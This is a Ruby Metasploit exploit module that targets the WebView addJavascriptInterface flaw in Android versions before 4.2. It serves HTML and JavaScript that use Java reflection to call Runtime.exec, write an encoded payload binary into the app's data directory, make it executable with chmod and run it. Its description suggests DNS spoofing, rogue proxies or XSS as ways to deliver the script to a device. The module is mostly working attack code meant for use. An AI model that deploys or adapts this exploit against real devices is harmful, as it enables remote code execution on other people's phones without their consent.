# ./sdk/tools/android and install Android 4.1.2 or below
# 

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
# require 'rex/proto/proxy/http'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Android < 4.2 WebView addJavascriptInterface MITM Code Execution',
      'Description' => %q{
            This module exploits an issue where MITM attackers can execute 
          arbitrary code on vulnerable Android devices. The issue is rooted in
          the use of the addJavascriptInterface function, which exposes Java
          Reflection to Javascript executing within a WebView instance. Many
          Android ad networks are known to be affected.

          To use this module, the attacker must have some way to inject the html/js
          served by metasploit into an affected Webview on the target device. There
          are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).

          Note: Adding a .js to the URL will return plain javascript (no HTML markup).
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'jduck', # original msf module
        'joev'   # static server
      ],
      'References'     => [
        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
        ['URL', 'http://50.56.33.56/blog/?p=314'],
        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+
                'addjavascriptinterface-remote-code-execution/']
      ],
      'Platform'       => 'linux',
      'Arch'           => ARCH_ARMLE,
      'DefaultOptions' => { 'PrependFork' => true },
      'Targets'        => [ [ 'Automatic', {} ] ],
      'DisclosureDate' => 'Dec 21 2012',
      'DefaultTarget'  => 0
    ))
  end

  def on_request_uri(cli, req)
    if req.uri.end_with?('js')
      print_status("Serving javascript")
      send_response(cli, js, 'Content-type' => 'text/javascript')
    else
      print_status("Serving HTML")
      send_response_html(cli, html)
    end
  end

  def js
    %Q|
      function exec(obj,i) {
        // ensure that the object contains a native interface
        try { obj.getClass().getName(); } catch(e) { return false; }

        // get the runtime so we can exec
        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
        
        // get the process name, which will give us our data path
        var p = m.invoke(null,null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
        var ch, path = '/data/data/';
        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
        path += '/#{Rex::Text.rand_text_alpha(8)}';

        // build the binary, chmod it, and execute it
        m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
        m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
        m.invoke(null,null).exec([path]).waitFor();

        return true;
      }

      for (i in window) { if (exec(window[i],i) === true) break; }
    |
  end

  def html
    "<!doctype html><html><body><script>#{js}</script></body></html>"
  end
end